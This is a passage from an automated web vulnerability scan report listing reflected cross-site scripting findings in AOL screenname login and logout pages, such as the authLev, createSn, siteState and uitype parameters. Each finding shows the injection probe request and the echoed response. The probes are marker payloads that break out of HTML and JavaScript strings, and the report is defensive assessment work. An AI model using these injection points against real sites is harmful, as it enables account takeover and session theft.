Set-Cookie: SNS_SC=diAxLjAga2lkIDEgZ3RrQTY1OGQ3dUkrOHU1UTFCRjUvWUkzNzZRPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnplasxXleFwX2zqxCjlprNu%2BnllaMIFy%2FIfwp0L%2BwdnBECtvBGW1GAeF%2BdlbMxXp1ILvTzec4o0clL4YtsTdUzuwEsY%2FRHgQeJSsDczbWsyA%3D%3D; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557285&0&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:01:25 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
ntCoent-Length: 1124
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 1124

<html>

<head>
<LINK href="https://sns-static.aolcdn.com/sns.v11r4/style/snsStyles.css" rel="stylesheet" type="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascr
...[SNIP]...
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascript">
// goto whatever redirUrl we got
snsInFrameRedir("https://rsp.web.aol.com/rsp-websvc-3.0/snsReg?sitedomain=startpage.aol.com&authLev=0f3662</script><a>cffa8bfca76&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.aol.com%2F&lang=en&locale=us&createSn=1&regPromoCode=825349&mcAuth=%2FBcAG03B9uUAAK85AXwDHk3B9yEIXscgAquZyS8AAA%3D%3D");
</SCRIPT>
...[SNIP]...

5.137. https://my.screenname.aol.com/_cqr/login/login.psp [authLev parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://my.screenname.aol.com
Path:	/_cqr/login/login.psp

Issue detail

The value of the authLev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b939e"><a%20b%3dc>33e4aee5348 was submitted in the authLev parameter. This input was echoed as b939e"><a b=c>33e4aee5348 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /_cqr/login/login.psp?sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=0b939e"><a%20b%3dc>33e4aee5348&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575004712-Repeat%7C1367647004712%3B%20s_nrgvo%3DRepeat%7C1367647004714%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:01:30 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEgSXB0d3NIRDNpWXdXYUY3c2VvRFYrNkNBSVZvPQ%3D%3D-wDdtxrRQhAbF7Rd0rJLDTB1ZCVneOSlCdPg61D9WuAo4%2Bazcgge3RVwyo50Q0KK2sgATKtzEJmSAr7manTK19DM29Wds1SUTYKGRtlEUCrq%2Fn5Z9uJIInT9jnZ8krH1m; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557290&1&1304557290&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:01:30 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
ntCoent-Length: 14910
Keep-Alive: timeout=15, max=497
Connection: Keep-Alive
Content-Length: 14910

<!doctype html>

<html>
   <head>
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/>


           <title>AOL.com - Welcome to AOL</title>


               <meta name="description" con
...[SNIP]...
<a href="https://account.login.aol.com/opr/_cqr/opr/opr.psp?sitedomain=startpage.aol.com&authLev=0b939e"><a b=c>33e4aee5348&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.aol.com%2F&lang=en&locale=us" tabindex="4" target="_top" id="forgot-pwd">
...[SNIP]...

5.138. https://my.screenname.aol.com/_cqr/login/login.psp [authLev parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://my.screenname.aol.com
Path:	/_cqr/login/login.psp

Issue detail

The value of the authLev request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f105c"%3b05f2bbf77cb was submitted in the authLev parameter. This input was echoed as f105c";05f2bbf77cb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /_cqr/login/login.psp?sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=0f105c"%3b05f2bbf77cb&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575004712-Repeat%7C1367647004712%3B%20s_nrgvo%3DRepeat%7C1367647004714%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:01:34 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEgZXdxeW01ZUg1YVVjSUtXN01sZHBpK3l1M1o0PQ%3D%3D-se7lQTawE77ArZCWVskhrxX6IVR6FIexcRHSK7RwrD4CFe6QkVzK8h%2BNPcnyOuMhIliispcwMf0U8fFPTQQ5L9wd8wqTof50hypJ0FFTpiNfcf9Mt8Bnrxe5o8IJfQok; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557294&1&1304557294&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:01:34 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
ntCoent-Length: 14880
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 14880

<!doctype html>

<html>
   <head>
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/>


           <title>AOL.com - Welcome to AOL</title>


               <meta name="description" con
...[SNIP]...
65.pfxID="sso";
s_265.pageName="sso : login";
s_265.channel="us.snssignin";
s_265.prop1='ssologin';
s_265.prop12="/snsUiDriver.jsp";
s_265.prop16="startpage.aol.com";
s_265.prop17="lp";
s_265.prop18="0f105c";05f2bbf77cb";
s_265.prop19="vl6";
s_265.prop20="en-us";
s_265.prop21="AOLPortal";
s_265.prop22=".aol.com";
s_265.prop23="aol-com-jv3-en-us";
s_265.mmxgo=true;
var s_code=s_265.t();
if(s_code)document.write(s_code
...[SNIP]...

5.139. https://my.screenname.aol.com/_cqr/login/login.psp [createSn parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://my.screenname.aol.com
Path:	/_cqr/login/login.psp

Issue detail

The value of the createSn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1952a</script><a>313f9e9f0c3 was submitted in the createSn parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /_cqr/login/login.psp?sitedomain=startpage.aol.com&authLev=0&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.aol.com%2F&lang=en&locale=us&createSn=11952a</script><a>313f9e9f0c3 HTTP/1.1
Host: my.screenname.aol.com
Connection: keep-alive
Referer: https://my.screenname.aol.com/_cqr/login/login.psp?sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=0&lang=en&locale=us
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: testcookie; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_SC=diAxLjAga2lkIDEgQVlTMUJ3VzRNZVAvUnNIclJpZGl1S2IyMDNRPQ%3D%3D-MwhW4P6%2F0%2BL6ODvOihE4Mz%2FdnNYp0U4IDrCoX8LRSmDq0RMdiaUfPoUocN3CCrqVyiLrMD9EZhdvRq7giYxAlyOjHinOlhTZ6rnw%2BAhDlDrmgnRttTTWUItbi21OuHY5; SNS_LDC=1&-&-&1304557177&1&1304557177&0

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:01:57 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEgaFp4T0pDRzZ3bWZ1akR0UWxuUFN6S1VrT2ZzPQ%3D%3D-MwhW4P6%2F0%2BL6ODvOihE4Mz%2FdnNYp0U4ILm9Rbwx8WtmmBeoRFSva4tCvYQLE5e0YRInE5XrlWX47Zx%2Fesn6jQOOzSB0CnoaINzLXxryW4waJ5Vc0pKIto%2FY1h1RmcYqF; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557317&0&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:01:57 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
ntCoent-Length: 14965
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 14965

<!doctype html>

<html>
   <head>
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/>


           <title>AOL.com - Welcome to AOL</title>


               <meta name="description" con
...[SNIP]...
uage="javascript" type="text/javascript">
prereqchecks('/badbrowser.psp?source=login&sitedomain=startpage.aol.com&authLev=0&siteState=OrigUrl%3Dhttp%3A%2F%2Fwww.aol.com%2F&lang=en&locale=us&createSn=11952a</script><a>313f9e9f0c3');
</script>
...[SNIP]...

5.140. https://my.screenname.aol.com/_cqr/login/login.psp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://my.screenname.aol.com
Path:	/_cqr/login/login.psp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8fd5b</script><a>09d37ffcf80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /_cqr/login/login.psp?sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=0&lang=en&locale=us&8fd5b</script><a>09d37ffcf80=1 HTTP/1.1
Host: my.screenname.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575004712-Repeat%7C1367647004712%3B%20s_nrgvo%3DRepeat%7C1367647004714%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:02:01 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEga1VPckdkQW41a25FM3plMDFBU2ZRTVl3dXdrPQ%3D%3D-AvLVUm%2BU30b8iQXdYfxz3No%2FJNGuXP4SsTxLPQ3sdu2sSCr1ejmSj96wM5Fb0%2F8rrIC091kjFYgtllS7Wm1wqNqoRtWzo6B7hjCOWBvTHu5GIAtNVIFf7kzxnjF6cFT%2B; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557321&1&1304557321&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:02:01 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
ntCoent-Length: 14962
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 14962

<!doctype html>

<html>
   <head>
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/>


           <title>AOL.com - Welcome to AOL</title>


               <meta name="description" con
...[SNIP]...
cript language="javascript" type="text/javascript">
prereqchecks('/badbrowser.psp?source=login&sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f&authLev=0&lang=en&locale=us&8fd5b</script><a>09d37ffcf80=1');
</script>
...[SNIP]...

5.141. https://my.screenname.aol.com/_cqr/login/login.psp [offerId parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://my.screenname.aol.com
Path:	/_cqr/login/login.psp

Issue detail

The value of the offerId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a08b</script><a>21dba1a5500 was submitted in the offerId parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /_cqr/login/login.psp?sitedomain=startpage.aol.com&authLev=1&siteState=http%3A%2F%2Fwww.aol.com&lang=en&locale=us&offerId=aol-com-jv3-en-us3a08b</script><a>21dba1a5500&createSn=1 HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:45 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEgd0U4cWo0UVRqY1htaWtkQU9ob2FaZXdVNGJBPQ%3D%3D-MwhW4P6%2F0%2BITb%2Fn3OrP1rSoyXqmBvdBs7xKICpeTLyZk9f%2BdQcFnLJAWGUi71ABtvjy%2BXu3FdoPq37FoWufLz574HI4uqcLlI2FOKchFWyjKnU4Uoi0xAiCoZFvc6CIDNJBE2VDcI2fC%2Flz7kvUGBO5Re3MFFW8jw9wKOXrYWkF0xqpL7nYW%2BA%3D%3D; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557425&0&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:45 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 1139
Connection: close

<html>

<head>
<LINK href="https://sns-static.aolcdn.com/sns.v11r4/style/snsStyles.css" rel="stylesheet" type="text/css">
<SCRIPT LANGUAGE="JavaScript" TYPE="text/javascr
...[SNIP]...
dirUrl we got
snsInFrameRedir("https://rsp.web.aol.com/rsp-websvc-3.0/snsReg?sitedomain=startpage.aol.com&authLev=1&siteState=http%3A%2F%2Fwww.aol.com&lang=en&locale=us&offerId=aol-com-jv3-en-us3a08b</script><a>21dba1a5500&createSn=1&regPromoCode=825349&mcAuth=%2FBcAG03B93EAAPdjAZjfI03B960IF%2BpHoxdLcLIAAA%3D%3D");
</SCRIPT>
...[SNIP]...

5.142. https://my.screenname.aol.com/_cqr/login/login.psp [siteState parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://my.screenname.aol.com
Path:	/_cqr/login/login.psp

Issue detail

The value of the siteState request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 640ea</script><a>b5726eea392 was submitted in the siteState parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /_cqr/login/login.psp?sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f640ea</script><a>b5726eea392&authLev=0&lang=en&locale=us HTTP/1.1
Host: my.screenname.aol.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; s_pers=%20s_getnr%3D1304575004712-Repeat%7C1367647004712%3B%20s_nrgvo%3DRepeat%7C1367647004714%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:01:21 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEgMnB0MlRWQzBoU2FmTGJQWC9mN0ZTUGpibFJBPQ%3D%3D-1n6uhHR2snl3HaEjUW3lwYahztfKdwk1mBhyZ9lpp%2B3ur%2FvqCzWsHYxANVWjEhraG%2FlyQo5smPtdZB0BvtIJkPpfEo2kRY%2Fp22oQgaEcftjxmw0ZvdpNOqgai9QbKyCs; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557281&1&1304557281&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:01:21 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
ntCoent-Length: 15073
Keep-Alive: timeout=15, max=500
Connection: Keep-Alive
Content-Length: 15073

<!doctype html>

<html>
   <head>
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/>


           <title>AOL.com - Welcome to AOL</title>


               <meta name="description" con
...[SNIP]...
<script language="javascript" type="text/javascript">
prereqchecks('/badbrowser.psp?source=login&sitedomain=startpage.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2fwww.aol.com%2f640ea</script><a>b5726eea392&authLev=0&lang=en&locale=us');
</script>
...[SNIP]...

5.143. https://my.screenname.aol.com/_cqr/login/login.psp [uitype parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://my.screenname.aol.com
Path:	/_cqr/login/login.psp

Issue detail

The value of the uitype request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b037</script><a>da98342092f was submitted in the uitype parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /_cqr/login/login.psp?sitedomain=aolmobile.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2faolmobile.aol.com%2fregistration%2finclude%2fsnsRefresh.jsp&authLev=0&lang=en&locale=us&uitype=popup9b037</script><a>da98342092f HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:47 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEgREh5TENlcjdvUlIzMUQySGtwMWlJNVA2V3FnPQ%3D%3D-cPJ5K0bb4upY7t%2BqFQyM3i0fj914oBHvUK%2BiKZ9H3B71rVvlT5xzjtNsGfK%2FPMQ42S%2FGQQLGm7tCFX3T7l0HAS1M7aTrlsttlgSIYrAjfKSih7ybmy28wcoNRMSfDrCnEZmcSy7IrptfO%2BvnFx%2FWAWYbb0gr3V7rqVgB1RShPs7CBYJ02FBYEQ%3D%3D; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557427&0&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:47 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 14885
Connection: close

<!doctype html>

<html>
   <head>
       <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8"/>


           <title>AOL.com - Welcome to AOL</title>


               <meta name="description" con
...[SNIP]...
eqchecks('/badbrowser.psp?source=login&sitedomain=aolmobile.aol.com&siteState=OrigUrl%3dhttp%3a%2f%2faolmobile.aol.com%2fregistration%2finclude%2fsnsRefresh.jsp&authLev=0&lang=en&locale=us&uitype=popup9b037</script><a>da98342092f');
</script>
...[SNIP]...

5.144. https://my.screenname.aol.com/_cqr/logout/mcLogout.psp [authLev parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://my.screenname.aol.com
Path:	/_cqr/logout/mcLogout.psp

Issue detail

The value of the authLev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5d86"><a%20b%3dc>cedf0535f04 was submitted in the authLev parameter. This input was echoed as d5d86"><a b=c>cedf0535f04 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /_cqr/logout/mcLogout.psp?sitedomain=yellowpages.aol.com&authLev=1d5d86"><a%20b%3dc>cedf0535f04&lang=en&locale=us&siteState=OrigUrl%3D HTTP/1.1
Host: my.screenname.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78; testcookie=; s_pers=%20s_getnr%3D1304575136213-Repeat%7C1367647136213%3B%20s_nrgvo%3DRepeat%7C1367647136214%3B; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; SNS_LDC=1&-&-&1304557177&2&1304557177&0; s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; SNS_SC=diAxLjAga2lkIDEgb2s2dGh3MGkyQ2dieDhlMFRpa2NBZXdzMFdVPQ%3D%3D-YYZuBkxMyMWngGYBlf7BBILTSNZE65KcDHQcS%2BDCB4w0mdPurRPtJyvnA0OjYbdsDRnOrht55NnSs0UDFB4dT40NVElma9xb3bh%2BeP7mtSAJ%2BEJEGHzsBOtqDf2bX6EEZhnSXZVU5M1g126ChPANO1DtgqZwo1EklAX2Q%2FaIKHcAR0iw3RMYwg%3D%3D; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b;

Response

HTTP/1.0 200 OK
Date: Thu, 05 May 2011 01:03:43 GMT
Pragma: No-cache
Cache-Control: no-cache, must-revalidate
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SNS_SC=diAxLjAga2lkIDEgRjIvZkdPLzQzSGNMU1p4Rk0zZitsc2pwVXZjPQ%3D%3D-UZKm3ggjROk%2FYU1IOZAZBOWS%2Fu5TzvbOC%2B%2Fr4BQv%2BAWPsc5vt%2FGgirdwtWI90VuDvi%2BGx9b%2FCaRZTvjXvERJx9s0BY4nrMuq5Gmq5Sfp70wXKZ4VMMUyiB2RodIaW6s5lj%2FpjhG%2FRZQlo%2FWq6p29yyzwNA6B6FJIwhsTv2MPRNCtiC%2BigA8BcY3LO0lgr8DWmElMFVQpSy0GtXCufQ1VAmBN5Dysu28g; Domain=my.screenname.aol.com; Path=/
Set-Cookie: SNS_LDC=1&-&-&1304557423&0&1304557177&0; Domain=my.screenname.aol.com; Expires=Sat, 04-Jun-2011 01:03:43 GMT; Path=/
Content-Type: text/html;charset=utf-8
Content-Language: en-US
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Content-Length: 1567
Connection: close

<html>
<head>
<LINK href="https://sns-static.aolcdn.com/sns.v11r4/style/snsStyles.css" rel="stylesheet" type="text/css">
<SCRIPT LA
...[SNIP]...
